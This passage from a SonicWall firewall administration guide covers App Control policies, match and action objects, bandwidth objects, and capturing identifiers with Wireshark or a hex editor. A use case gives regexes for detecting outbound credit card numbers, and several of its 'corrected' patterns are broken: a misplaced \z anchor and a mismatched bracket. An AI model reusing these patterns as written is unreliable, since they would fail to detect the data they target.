If the policy type is CFS, select an entry from the CFS Allow List drop-down menu. The menu contains any defined CFS Allow/Forbidden List type of match objects, and also provides None as a selection. The domains in the selected entry will not be affected by the policy.
23
If the policy type is CFS, select an entry from the CFS Forbidden List drop-down menu. The menu contains any defined CFS Allow/Forbidden List type of match objects, and also provides None as a selection. The domains in the selected entry will be denied access to matching content, instead of having the defined action applied.
24
If the policy type is CFS, select the Enable Safe Search Enforcement check box to prevent safe search enforcement from being disabled on search engines such as Google, Yahoo, Bing, and others.
* 
NOTE: Google Safe Search helps prevent adult content or other potentially offensive content from appearing in search results.
25
If the policy type is CFS, select Enable YouTube for Schools and enter your School ID to enable the YouTube for Schools feature. For more information, see YouTube for Schools and SonicWall Content Filtering Service.
26
Click OK.

Using the Application Control Wizard

The Application Control wizard provides safe configuration of App Control policies for many common use cases, but not for everything. If at any time during the wizard you are unable to find the options that you need, you can click Cancel and proceed using manual configuration. When configuring manually, you must remember to configure all components, including match objects, actions, email address objects if required, and finally, a policy that references them. For the manual policy creation procedure, see the Prerequisites to Configuring App Rules Policies.

To use the wizard to configure Application Control:
1
Login to the SonicWALL security appliance.
2
In the SonicWALL banner at the top of the page, click the Wizards icon. The wizards Welcome page displays.
3
Select the Application Control Wizard radio button and then click Next.
4
In the Application Control Wizard Introduction page, click Next.
5
In the Application Control Policy Type page , click a selection for the policy type, and then click Next.

You can choose among SMTP, incoming POP3, Web Access, or FTP file transfer. The policy that you create applies only to the type of traffic that you select. The next page varies, depending on your choice here.

6
In the Select <your choice> Rules for Application Control page, select a policy rule from the choices supplied, and then click Next.

Depending on your choice in the previous step, this page is one of four possible:

Select SMTP Rules for Application Control
Select POP3 Rules for Application Control
Select Web Access Rules for Application Control
Select FTP Rules for Application Control
7
The page displayed varies, depending on your choice of policy rule in the previous step. For the following policy rules, the wizard displays the Set Application Control Object Keywords and Policy Direction page on which you can select the traffic direction to scan, and the content or keywords to match, and then click Next.
All SMTP policy rule types except Specify maximum email size
All POP3 policy rule types
All Web Access policy rule types except Look for usage of certain web browsers and Look for usage of any web browser, except the ones specified
All FTP policy types except Make all FTP access read-only and Disallow usage of SITE command
8
In the Set Application Control Object Keywords and Policy Direction dialog, perform the following steps:
a
In the Direction drop-down menu, select the traffic direction to scan: Incoming, Outgoing, or Both.
b
Do one of the following:
* 
NOTE: If you selected a choice with the words except the ones specified in the previous step, content that you enter here will be the only content that does not cause the action to occur. See Negative Matching.
In the Content field, enter or paste a text or hexadecimal representation of the content to match, and then click Add. Repeat until all content is added to the List text box.
To import keywords from a predefined text file that contains a list of content values, one per line, click Load From File.
c
Click Next.
9
If you selected a policy type in the previous step that did not result in the Set Application Control Object Keywords and Policy Direction page with the standard options, the wizard displays a page that allows you to select the traffic direction, and certain other choices, depending on the policy type.
a
In the Direction drop-down menu, select the traffic direction to scan.
b
SMTP: In the Set Maximum Email Size page, in the Maximum Email Size field, enter the maximum number of bytes for an email message.
c
Web Access: In the Application Control Object Settings page, the Content field has a drop-down list with a limited number of choices, and no Load From File button is available. Select a browser from the drop-down menu.
d
FTP: In the special-case Set Application Control Object Keywords and Policy Direction page, you can only select the traffic direction to scan.
e
Click Next.
10
In the Application Control Action Settings page, select the action to take when matching content is found in the specified type of network traffic, and then click Next.

You will see one or more of the following choices, depending on the policy type:

 

Policy Type

Available Action

All Types

Log Only

All Types

Bypass DPI

SMTP

Blocking Action - block and send custom email reply

SMTP

Blocking Action - block without sending email reply

SMTP

Add Email Banner (append text at the end of email)

POP3

Blocking Action - disable attachment and add custom text

Web Access

Blocking Action - custom block page

Web Access

Blocking Action - redirect to new location

Web Access

Blocking Action - Reset Connection

Web Access

Manage Bandwidth

11
In the second Application Control Action Settings page (if it is displayed), in the Content field, enter the text or URL that you want to use, and then click Next.

The second Application Control Action Settings page is only displayed when you selected an action in the previous step that requires additional text. For a Web Access policy type, if you selected an action that redirects the user, you can enter the new URL into the Content field.

12
In the Select Name for Application Control Policy page, in the Policy Name field, enter a descriptive name for the policy, and then click Next.
13
In the Confirm Policy Settings page, review the displayed values for the new policy and do one of the following:
To create a policy using the displayed configuration values, click Apply.
To change one or more of the values, click Back.
To exit the wizard without creating the policy, click Cancel.
14
In the Application Control Policy Complete page, to exit the wizard, click Close.
* 
NOTE: You can configure Application Control policies without using the wizard. When configuring manually, you must remember to configure all components, including match objects; action objects, bandwidth, and email address objects if required; and finally, a policy that references them.

Firewall > App Control Advanced

The Firewall > App Control Advanced page:

Displays the status of the App Control database.
Provides a way to configure global App Control policies using categories, applications, and signatures.

Policies configured on this page are independent from App Rules policies, and do not need to be added to an App Rules policy to take effect.

You can configure the following settings on this page:

Select a category, an application, or a signature.
Select blocking, logging, or both as the action.
Specify users, groups, or IP address ranges to include in or exclude from the action.
Set a schedule for enforcing the controls.

While these application control settings are independent from App Rules policies, you can also create application match objects for any of the categories, applications, or signatures available here, and use those match objects in an App Rules policy. See the Application List Objects for more information.

* 
NOTE: Informational videos with App Control Advanced configuration examples are available online. For example, see How to Block Dropbox using App Control Advanced.

Additional videos are available at: https://support.software..com/videos-product-select.

Topics:

Displaying App Control Status

The App Control Status section displays information about the signature database, allows you to update the database, and provides a link for enabling App Control.

 

App Signature Database

Indicates whether the App Signature database has been downloaded

App Signature Database Timestamp

Displays the UTC day and time the App Signature database was downloaded

To update the App Signature database, click the Update button.

Last checked

Displays the day and time SonicOS last checked for updates to the App Signature database

App Signature DB Expiration Date

Displays the day that the App Signature database expires

To enable App Control on a per-zone basis, click the link, here, in the Note. The link displays the Network > Zones page.

Configuring App Control Global Settings

The App Control Global Settings section provides these global settings:

Enable App Control
Enable Logging For All Apps
Configure App Control Settings
Reset App Control Settings & Policies

App Control is a licensed service, and you must also enable it to activate the functionality.

To enable App Control and configure the global settings:
1
To globally enable App Control, select the Enable App Control check box. This option is not selected by default.
2
Optionally, to enable logging for all apps, select the Enable Logging for All Apps check box. This option is not selected by default.
3
To activate App Control and, if enabled, logging, click Accept.
4
To enable App Control on a network zone, navigate to the Network > Zones page.
5
Click the Configure icon for the desired zone. The Edit Zone dialog displays.

6
Select the Enable App Control Service check box, then click OK.
* 
NOTE: App Control policies are applied to traffic within a network zone only if you enable the App Control Service for that zone. App Rules policies are independent, and not affected by the App Control setting for network zones.

The Network > Zones page displays a green indicator in the App Control column for any zones that have the App Control service enabled.

7
To configure a global exclusion list for App Control policies, go to the Firewall > App Control Advanced page.
8
In the App Control Global Settings section, click the Configure App Control Settings button. The App Control Exclusion List dialog opens.

9
Select enable the App Control exclusion list, select the Enable Application Control Exclusion List check box. This option is not selected by default.
10
To use:
The IPS exclusion list, which can be configured from the Security Services > Intrusion Prevention page, select the Use IPS Exclusion List radio button. This option is selected by default when you enable the exclusion list.
An address object for the exclusion list, select the Use Application Control Exclusion Address Object radio button, and then select an address object from the drop-down menu.
11
Click OK.
To reset App Control settings and policy configuration to the factory default values:
1
Click the Reset App Control Settings & Policies button on the Firewall > App Control Advanced page
2
Click OK in the confirmation dialog.

Viewing Signatures

You can change the App Control Advanced display through the various View Styles:

Category
All (default) – Displays all categories and their signature applications
Individual category – Displays all signature applications for the specified category
Application
All (default) – Displays all signature applications associated with the specified category or categories
Viewed by
Signature – Displays all signature applications associated with the specified category and the signatures associated with the application
Application (default) – Displays all signature applications associated with the specified category or categories
Category – Displays all categories or the category specified in the Category View Style

You can also display the Edit App Control Signature dialog for a particular signature by entering its ID in the Lookup Signature ID field.

Topics:

Viewing by All Categories and All Applications by Applications

The App Control Advanced table displays the following columns; for a description of what each column displays, see Viewing by All Categories and All Applications by Signatures.

 
Category
Log
Application
Comments
Block
Configure

Viewing by All Categories and All Applications by Signatures

 

Category

Name of the selected signature category or of all signature categories. All signature applications are grouped under the same category heading, such as APP-UPDATE.

Application

Name of each signature application within a category.

Name

Signature name.

ID

Signature ID.

Block

Indicates whether the category or application is blocked. If blocking is enabled, an Enabled icon appears in this column. The word, Default, may appear for a category.

Log

Indicates whether the category or application is logged. If logging is enabled, an Enabled icon appears in this column.

Direction

Traffic direction:

Incoming
Incoming, to Client
Incoming, to Server
Incoming, to Client, to Server
Outgoing
Outgoing to Client
Outgoing, to Server
Outgoing, to Client, to Server
Both
Both, to Client
Both, to Server
Both, to Client, to Server

Comments

This column is blank unless the following has been configured for the category and/or signature application:

Information icon – Address inclusion/exclusion settings.
Clock icon – Schedule other than Always On.

Configure

Edit icon that displays the appropriate dialog for modifying the signature application settings.

Viewing by All Categories and All Applications by Category

The App Control Advanced table displays the following columns; for a description of what each column displays, see Viewing by All Categories and All Applications by Signatures.

 
Category
Comments
Block
Configure
Log

 

Viewing just One Category

You can restrict the App Control Advanced table to display the signature applications of just one category by:

Selecting a category from the Category drop-down menu.
Clicking the category heading, such as APP-UPDATE.

Viewing just One Application

You can restrict the App Control Advanced table to display the signatures of just one application by selecting an application from the Application drop-down menu.

Displaying Details of Signature Applications

You can display details about signature applications by clicking on the name of the signature application. The Applications Details popup dialog displays.

 

Sig Id

Signature ID.

Category

Category of signature application, such as APP-UPDATE or GAMING.

Technology

Type of software:

Application
Browser
Network Infrastructure

Risk

Level of risk for each signature:

Low (green)
Guarded (blue)
Elevated (yellow)

Clicking the signature ID displays the SonicALERT page for the signature.

Displaying Details of Application Signatures

You can display details about signature applications by clicking on the name of the signature. The App Signature Details popup dialog displays.

 

Category

Category of signature application, such as APP-UPDATE or GAMING.

App Name

Name of the signature application.

Alert Level

Alert level:

Low
Medium
High

Threat Level

Level of threat of the signature:

Low (green)
Guarded (blue)
Elevated (yellow)

Configuring App Control

Topics:

Configuring Application Control by Category

Category-based configuration is the most broadly based method of policy configuration on the Firewall > App Control Advanced page. The categories are listed in the Category drop-down menu.

To configure an App Control policy for an application category:
1
Navigate to the Firewall > App Control Advanced page.
2
In the App Control Advanced section, select an application category from the Category drop-down menu. The field’s Configure button becomes active as soon as a category is selected.
3
Click the Configure button. The App Control Category Settings dialog for the selected category displays.

4
To block applications in this category, select Enable in the Block drop-down menu.
5
To create a log entry when applications in this category are detected, select Enable in the Log drop-down menu.
6
To target the selected block or log actions to a specific user or group of users, select a user group or individual user from the Included Users/Groups drop-down menu. Select All to apply the policy to all users.
7
To exclude a specific user or group of users from the selected block or log actions, select a user group or individual user from the Excluded Users/Groups drop-down menu. Select None to apply the policy to all users.
8
To target the selected block or log actions to a specific IP address or address range, select an Address Group or Address Object from the Included IP Address Range drop-down menu. Select All to apply the policy to all IP addresses.
9
To exclude a specific IP address or address range from the selected block or log actions, select an Address Group or Address Object from the Excluded IP Address Range drop-down menu. Select None to apply the policy to all IP addresses.
10
To enable this policy during specific days of the week and hours of the day, select one of the following schedules from the Schedule drop-down menu:
Always on – Enable the policy at all times.
Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
11
To specify a delay between log entries for repetitive events, enter the number of seconds for the delay into the Log Redundancy Filter field.
12
Click OK.

Configuring Application Control by Application

Application-based configuration is the middle level of policy configuration on the Firewall > App Control Advanced page, between the category-based and signature-based levels.

This configuration method allows you to create policy rules specific to a single application if you want to enforce the policy settings only on the signatures of this application without affecting other applications in the same category.

To configure an App Control policy for a specific application:
1
Navigate to the Firewall > App Control Advanced page.
2
Under App Control Advanced, select a category from the Category drop-down menu.

3
Select an application in this category from the Application drop-down menu. A Configure button appears to the right of the field as soon as an application is selected.

4
Click the Configure button. The App Control App Settings dialog for the selected application displays.

The fields at the top of the dialog are not editable. These fields display the values for the Application Category and Application Name.

* 
TIP: The following application configuration options default to the current settings of the category to which the application belongs; for example, Use Category Settings (All). To retain this connection to the category settings for any of these fields, leave this selection in place for those fields.
5
To block this application, select Enable in the Block drop-down menu.
6
To create a log entry when this application is detected, select Enable in the Log drop-down menu.
7
To target the selected block or log actions to a specific user or group of users, select a user group or individual user from the Included Users/Groups drop-down menu. Select All to apply the policy to all users.
8
To exclude a specific user or group of users from the selected block or log actions, select a user group or user from the Excluded Users/Groups drop-down menu. Select None to apply the policy to all users.
9
To target the selected block or log actions to a specific IP address or address range, select an Address Group or Address Object from the Included IP Address Range drop-down menu. Select All to apply the policy to all IP addresses.
10
To exclude a specific IP address or address range from the selected block or log actions, select an Address Group or Address Object from the Excluded IP Address Range drop-down menu. Select None to apply the policy to all IP addresses.
11
To enable this policy during specific days of the week and hours of the day, select one of the following schedules from the Schedule drop-down menu:
Always on – Enable the policy at all times.
Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
12
To specify a delay between log entries for repetitive events, enter the number of seconds for the delay into the Log Redundancy Filter field.
13
To see detailed information about the application, click here in the Note at the bottom of the dialog.
14
Click OK.

Configuring Application Control by Signature

Signature-based configuration is the lowest, most specific, level of policy configuration on the Firewall > App Control Advanced page.

Setting a policy based on a specific signature allows you to configure policy settings for the individual signature without influence on other signatures of the same application.

To configure an App Control policy for a specific signature:
1
Navigate to the Firewall > App Control Advanced page.
2
Under App Control Advanced, select a category from the Category drop-down menu.
3
Select an application in this category from the Application drop-down menu.
4
To display the specific signatures for this application, select Signature in the Viewed by drop-down menu. For example, the FreeStyle gaming application has two signatures.

5
Click the Configure button in the row for the signature you want to work with. The App Control Signature Settings dialog displays.

The fields at the top of the dialog are not editable. These fields display the values for the Signature Category, Signature Name, Signature ID, Priority, and Direction of the traffic in which this signature can be detected.

* 
TIP: The following application configuration options default to the current settings of the category to which the application belongs; for example, Use Category Settings (All). To retain this connection to the category settings for any of these fields, leave this selection in place for those fields.
6
To block this signature, select Enable in the Block drop-down menu.
7
To create a log entry when this signature is detected, select Enable in the Log drop-down menu.
8
To target the selected block or log actions to a specific user or group of users, select a user group or individual user from the Included Users/Groups drop-down menu. Select All to apply the policy to all users.
9
To exclude a specific user or group of users from the selected block or log actions, select a user group or individual user from the Excluded Users/Groups drop-down menu. Select None to apply the policy to all users.
10
To target the selected block or log actions to a specific IP address or address range, select an Address Group or Address Object from the Included IP Address Range drop-down menu. Select All to apply the policy to all IP addresses.
11
To exclude a specific IP address or address range from the selected block or log actions, select an Address Group or Address Object from the Excluded IP Address Range drop-down menu. Select None to apply the policy to all IP addresses.
12
To enable this policy during specific days of the week and hours of the day, select one of the following schedules from the Schedule drop-down menu:
Always on – Enable the policy at all times.
Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
13
To specify a delay between log entries for repetitive events, type the number of seconds for the delay into the Log Redundancy Filter field.
14
To see detailed information about the signature, click here in the Note at the bottom of the dialog.
15
Click OK.

Firewall > Match Objects

This section describes how to manually create a match object. For detailed information about match object types, see Match Objects.

Topics:

Configuring Match Objects

To configure a match object:
1
Navigate to Firewall > Match Objects.

2
Click Add New Match Object. The Add/Edit Match Object dialog displays.

3
In the Object Name field, enter a descriptive name for the object.
4
Select an Match Object Type from the drop-down menu. Your selection here affects available options in this dialog. See Match Objects for a description of match object types.
5
Select a Match Type from the drop-down menu. The available selections depend on the match object type.
6
For the Input Representation, click:
Alphanumeric to match a text pattern.
Hexadecimal if you want to match binary content.
7
In the Content field, enter the pattern to match.
8
Click Add. The content appears in the List table.

If the Match Type is Regex Match, you can select one of the predefined regular expressions and then click Pick to add it to the List. You can also type a custom regular expression into the Content field, and then click Add to add it to the List.

Alternatively, you can click Load From File to import a list of elements from a text file. Each element in the file must be on a line by itself.

To remove an element from the list, select the element in the List option, and then click Remove. To remove all elements, click Remove All.

9
Repeat Step 6 through Step 8 to add another element to match.
10
Click OK.

Configuring Application List Objects

This section describes how to create an Application List object, which can be used by Application Control policies in the same way as a match object.

For detailed information about application list object types include information about the Security tab and Category tab, see Application List Objects.

To configure an application list object:
1
Navigate to Firewall > Match Objects.
2
Click the Add Application List Object button. The Create Match Object dialog displays.

You can control which applications are displayed by selecting one or more application categories, threat levels, and technologies. When the application list is reduced to a list that is focussed on your preferences, you can select the individual applications for your filter.

3
In the Search field near the top right of the page, optionally enter in part of an application name and click the Search icon to search for applications with that key word in their names.
4
In the Category pane, select the check boxes for one or more application categories.
5
In the Threat Level pane, select the check boxes for one or more threat levels.
6
In the Technology pane, select the check boxes for one or more technologies.
7
Click the plus sign next to each application you want to add to your filter object. To display a description of the application, click its name in the Name column. A Detailed Information pop-up dialog displays with the following information:
Description
Sig ID; you can click this ID to display a SonicWALL SonicAlert
Category
Technology, such as Application or Browser
Risk, with color-coded threat level

As you select the applications for your filter, the plus sign icon becomes a green checkmark icon and the selected applications appear in the Application Group pane on the right. You can edit the list in this field by deleting individual items or by clicking the eraser to delete all items.

8
When finished selecting the applications to include, type in a name for the object in the Match Object Name field.
9
Click the Save Application Match Object button. You will see the object name listed on the Firewall > Match Objects page with an object type of Application List. This object can then be selected when creating an App Rules policy.

Firewall > Action Objects

If you do not want one of the predefined actions, you can select one of the configurable actions. The Add/Edit Action Object dialog provides a way to customize a configurable action with text or a URL. The predefined actions plus any configurable actions that you have created are available for selection when you create an App Rules policy. For more information about actions, see Action Objects.

To configure settings for an action:
1
Navigate to Firewall > Action Objects.

2
Click Add New Action Object. The Add/Edit Action Object dialog displays.

3
In the Action Name field, type a descriptive name for the action. The name can be from 1 to 96 characters.
4
In the Action drop-down menu, select the action that you want:
Block SMTP E-Mail - Send Error Reply (default) – Blocks the transfer of an email and returns a custom SMTP reply.
Disable E-Mail Attachment - Add Text – Disables and garbles email attachment and adds custom text at the end of an email.
Email - Add Text – Adds custom text at the end of an email.
FTP Notification Reply – Sends a custom FTP error reply over the FTP control channel without resetting the FTP control channel connection.
HTTP Block Page – Sends a custom HTTP web page with a custom background color.
HTTP Redirect – Redirects a web browser to another web site or web page. A full URI is the preferred method of redirection. For example, to redirect a user to the www.sonicwall.com web site, enter http://www.sonicwall.com in the Content field.
5
In the Content field, enter the text or URL to be used in the action.
6
If HTTP Block Page was selected as the action, the Color drop-down menu displays.

Choose a background color for the block page: White (default), Yellow, Red, or Blue.

7
Optionally, to see a preview of the blocked-page message, click the Preview button. A separate browser dialog displays with the selected background color and text.
8
Click OK.

For information on configuring bandwidth management in an action object, see Bandwidth Management Overview.

Firewall > Address Objects

* 
NOTE: For increased convenience and accessibility, the Address Objects page can be accessed either from Network > Address Objects or Firewall > Address Objects. The page is identical regardless of which tab it is accessed through. For information on configuring Address Objects, see Network > Address Objects.

Firewall > Service Objects

* 
NOTE: For increased convenience and accessibility, the Service Objects page can be accessed either from Firewall > Service Objects or Network > Services. The page is identical regardless of which tab it is accessed through. For information on configuring Service Objects, see Network > Services.

Firewall > Bandwidth Objects

Topics:

About Advanced Bandwidth Management

Bandwidth management configuration is based on policies which specify bandwidth limitations for traffic classes. A complete bandwidth management policy consists of two parts: a classifier and a bandwidth rule.

A classifier specifies the actual parameters, such as priority, guaranteed bandwidth, and maximum bandwidth, and is configured in a bandwidth object. Classifiers identify and organize packets into traffic classes by matching specific criteria.

For information on using Bandwidth Objects in Access Rules, App Rules, and Action Objects, see Bandwidth Management Overview.

Configuring Bandwidth Objects

To add or configure a bandwidth object:
1
Go to Firewall > Bandwidth Objects.

2
Do one of the following:
Click the Add button to create a new Bandwidth Object.
Click the Configure button for the Bandwidth Object you want to change.

The Add/Edit Bandwidth Object dialog displays.

3
Click the General tab.
4
In the Name box, enter a name for this bandwidth object.
5
In the Guaranteed Bandwidth box, enter the amount of bandwidth that this bandwidth object will guarantee to provide for a traffic class (in kbps or Mbps).
6
In the Maximum Bandwidth box, enter the maximum amount of bandwidth that this bandwidth object will provide for a traffic class.
7
The actual allocated bandwidth may be less than this value when multiple traffic classes compete for a shared bandwidth.
8
In the Traffic Priority box, enter the priority that this bandwidth object will provide for a traffic class. The highest priority is 0. The lowest priority is 7.
9
When multiple traffic classes compete for shared bandwidth, classes with the highest priority are given precedence.
10
In the Violation Action box, enter the action that this bandwidth object will provide (delay or drop) when traffic exceeds the maximum bandwidth setting.
11
Delay specifies that excess traffic packets will be queued and sent when possible.
12
Drop specifies that excess traffic packets will be dropped immediately.
13
In the Comment box, enter a text comment or description for this bandwidth object.

Firewall > Email Address Objects

You can create email address objects for use with SMTP Client policies. An email address object can be a list of users or an entire domain. For more information about email address objects, see Email Address Objects.

To configure email address object settings:
1
Navigate to Firewall > Email Addr Objects.
2
Click Add New Email Address Object. The Add/Edit Email Addr Object dialog displays.

3
Type a descriptive name for the email address object in the Email User Object Name field.
4
For Match Type, select Exact Match or Partial Match. Use Partial Match when you want to match a domain or any part of the email address that you provide. To match the email address exactly, select Exact Match.

For example, to match on a domain, select Partial Match in the previous step and then type @ followed by the domain name in the Content field, for example, type: @SonicWALL.com. To match on an individual user, select Exact Match in the previous step and then type the full email address in the Content field, for example: jsmith@SonicWALL.com.

Alternatively, you can click Load From File to import a list of elements from a text file. Each element in the file must be on a line by itself.

5
In the Content field, type the content to match.
6
Click Add.
7
Repeat Step 5 and Step 6 until you have added as many elements as you want.

By defining an email address object with a list of users, you can use Application Control to simulate groups.

8
Click OK.

Verifying App Control Configuration

To verify your policy configuration, you can send some traffic that should match your policy. You can use a network protocol analyzer such as Wireshark to view the packets. For information about using Wireshark, see Wireshark.

Be sure to test for both included and excluded users and groups. You should also run tests according to the schedule that you configured, to determine that the policy is in effect when you want it to be. Check for log entries in the Log > Log Monitor page.

The bottom of the Firewall > App Rules page shows the number of policies defined, the number enabled, and the maximum number of policies allowed.

Useful Tools

This section describes two software tools that can help you use Application Control to the fullest extent. The following tools are described:

Wireshark

Wireshark is a network protocol analyzer that you can use to capture packets from applications on your network. You can examine the packets to determine the unique identifier for an application, which you can use to create a match object for use in an App Rules policy.

Wireshark is freely available at: http://www.wireshark.org

The process of finding the unique identifier or signature of a Web browser is illustrated in the following packet capture sequence.

1
In Wireshark, click Capture > Interfaces to view your local network interfaces.

2
In the Capture Interfaces dialog box, click Capture to start a capture on your main network interface:

3
In the captured output, locate and click the HTTP GET command in the top pane.
4
View the source for it in the center pane. In the source code, locate the line beginning with User-Agent.

5
Scroll to the right to find the unique identifier for the browser. In this case it is Firefox/1.5.0.7.

6
Type the identifier into the Content field in the Match Objects Settings dialog.

7
Click OK to create a match object that you can use in a policy.

Hex Editor

You can use a hexadecimal (hex) editor to view the hex representation of a file or a graphic image. One such hex editor is XVI32, developed by Christian Maas and available at no cost at the following URL:

http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm

For example, if there is a certain graphic contained within all confidential company documents, you could use the hex editor to obtain a unique identifier for the graphic, and then use the identifying hex string to create a match object. You could reference the match object in a policy that blocks the transfer of files with content matching that graphic.

Using the SonicWall graphic as an example, you would take the following steps:

1
Start XVI32 and click File > Open to open the graphic image GIF file.

2
In the left pane, mark the first 50 hex character block by selecting Edit > Block <n> chars… and then select the decimal option and type 50 in the space provided. This will mark the first 50 characters in the file, which is sufficient to generate a unique thumbprint for use in a custom match object.

Alternatively you can mark the block by using the following sequence:

Click on the first character (#0).
Press Ctrl+B.
Click on the character in position #49.
Press Ctrl+B.

To locate the character in position #49, click on a character in the right pane (the text pane) and then look at the bottom left corner for the decimal address. Try different characters until it shows Adr. dec: 49.

* 
NOTE: You must click on the corresponding location in the left pane before you press Ctrl+B to mark the block.

When the block is marked, it changes to red font. To unmark a block of characters, press Ctrl+U.

3
After you mark the block, click Edit > Clipboard > Copy As Hex String.
4
In Textpad or another text editor, press Ctrl+V to paste the selection and then press Enter to end the line.

This intermediary step is necessary to allow you to remove spaces from the hex string.

5
In Textpad, click Search > Replace to bring up the Replace dialog.
6
Type a space into the Find field and leave the Replace field empty.
7
Click Replace All.

The hex string now has 50 hex characters with no spaces between them.

8
Double-click the hex string to select it, then press Ctrl+C to copy it to the clipboard.
9
In SonicOS, navigate to Firewall > Match Objects.
10
Click Add New Match Object. The Add/Edit Match Object Settings dialog displays.
11
Type a descriptive name into the Object Name field.
12
In the Match Object Type drop-down menu, select Custom Object.
13
For Input Representation, select Hexadecimal.
14
In the Content field, press Ctrl+V to paste the contents of the clipboard.
15
Click Add.

16
Click OK.

You now have a Match Object containing a unique identifier for the image. You can create an App Rules policy to block or log traffic that contains the image matched by this Match Object. For information about creating a policy, see Prerequisites to Configuring App Rules Policies.

App Control Use Cases

Application Control provides the functionality to handle several types of access control very efficiently. The following use cases are presented in this section:

Creating a Regular Expression in a Match Object

Predefined regular expressions can be selected during configuration, or you can configure a custom regular expression. This use case describes how to create a Regex Match object for a credit card number, while illustrating some common errors.

For example, a user creates a Regex Match object for a credit card number, with the following inefficient and also slightly erroneous construction:

[1-9][0-9]{3} ?[0-9]{4} ?[0-9]{4} ?[0-9]{4}

Using this object, the user attempts to build a policy. After the user clicks OK, the appliance displays a “Please wait…” message, but the management session is unresponsive for a very long time and the regular expression may eventually be rejected.

This behavior occurs because, in custom object and file content match objects, regular expressions are implicitly prefixed with a dot asterisk (.*). A dot matches any of the 256 ASCII characters except ‘\n’. This fact, the match object type used, and the nature of the regular expression in combination causes the control plane to take a long time to compile the required data structures.

The fix for this is to prefix the regular expression with a '\D'. This means that the credit card number is preceded by a non-digit character, which actually makes the regular expression more accurate.

Additionally, the regular expression shown above does not accurately represent the intended credit card number. The regular expression in its current form can match several false positives, such as 1234 12341234 1234. A more accurate representation is the following:

\D[1-9][0-9]{3} [0-9]{4} [0-9]{4} [0-9]{4}

or

\D[1-9][0-9]{3}[0-9]{4}[0-9]{4}[0-9]{4}

which can be written more concisely as:

\D\z\d{3}( \d{4}){3}

or

\D\z\d{3}(\d{4})[3}

respectively.

These can be written as two regular expressions within one match object or can be further compressed into one regular expression such as:

\D\z\d{3}(( \d{4}){3}|(\d{12}))

You can also capture credit card numbers with digits separated by a '-' with the following regular expression:

\D\z\d{3}(( \d{4}){3}|(-\d{4}){3}|(\d{12}))

The preceding ‘\D’ should be included in all of these regular expressions.

Policy-Based Application Control

The SonicWALL application signature databases are part of the Application Control feature, allowing very granular control over policy configuration and actions relating to them. These signature databases are used to protect users from application vulnerabilities as well as worms, Trojans, peer-to-peer transfers, spyware and back-door exploits. The extensible signature language used in the SonicWALL Reassembly Free Deep Packet Inspection engine also provides proactive defense against newly discovered application and protocol vulnerabilities.

To create an Application Control policy:
1
Navigate to Firewall > Match Objects.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.

3
Give the Match Object a descriptive name in the Object Name field.
4
Create a match object of type Application Signature List or Application Signature Category List by selecting either option from the Match Object Type drop-down menu. These two types allow for selection of either general application categories or individual application signatures.

5
Click OK.
6
Navigate to Firewall > App Rules.
7
Click Add New Policy. The Edit App Control Policy Dialog displays.
8
Create a new App Rules policy of type App Control Content that uses the match object.

9
Click OK.

Logging Application Signature-Based Policies

As with other match object policy types, logging can be enabled on application content policies. By default, these logs are displayed in the standard format, showing the Application Control policy that triggered the alert/action. To obtain more detail about the log event, select the Log using App Control message format check box in the App Control Policies Settings screen for that policy.

Compliance Enforcement

Many businesses and organizations need to ensure compliance with their policies regarding outbound file transfer. Application Control provides this functionality in HTTP, FTP, POP3, and SMTP contexts. This can help companies meet regulatory requirements such as HIPAA, SOX, and PCI. See SonicOS Provides Compliance Enforcement.

SonicOS Provides Compliance Enforcement

When you configure the policy or policies for this purpose, you can select Direction > Basic > Outgoing to specifically apply your file transfer restrictions to outbound traffic. Or, you can select Direction > Advanced and then specify the exact zones between which to prevent file transfer. For example, you can specify LAN to WAN, LAN to DMZ, or any other zones that you have defined.

Server Protection

Servers are typically accessed by many untrusted clients. For best protection of these valuable resources, you should have multiple lines of defense. With Application Control on your gateway, you can configure policies to protect your servers. For example, you can create a policy that blocks all FTP put commands to prevent anyone from writing a file to a server (see Blocking FTP Commands). Even though the server itself may be configured as read-only, this adds a layer of security that you control. Your server is still protected even if its configuration is changed by an error, a side-effect of a patch, or by someone with malicious intent. With Application Control, you can effectively control content upload for servers using HTTP, SMTP, POP3, and FTP. See Application Control Controlling Content Upload.

Application Control Controlling Content Upload

An example of policies that affect servers might be a small ISP providing three levels of service to its customers, whose servers are sitting in its rack. At the gold level, a customer can host a Web server, Email server, and FTP server. At the silver level, a customer can host only a Web server and Email server. At the bronze level, the hosting package only allows a Web server. The ISP could use Application Control to enforce these restrictions, by creating a policy for each customer.

Hosted Email Environments

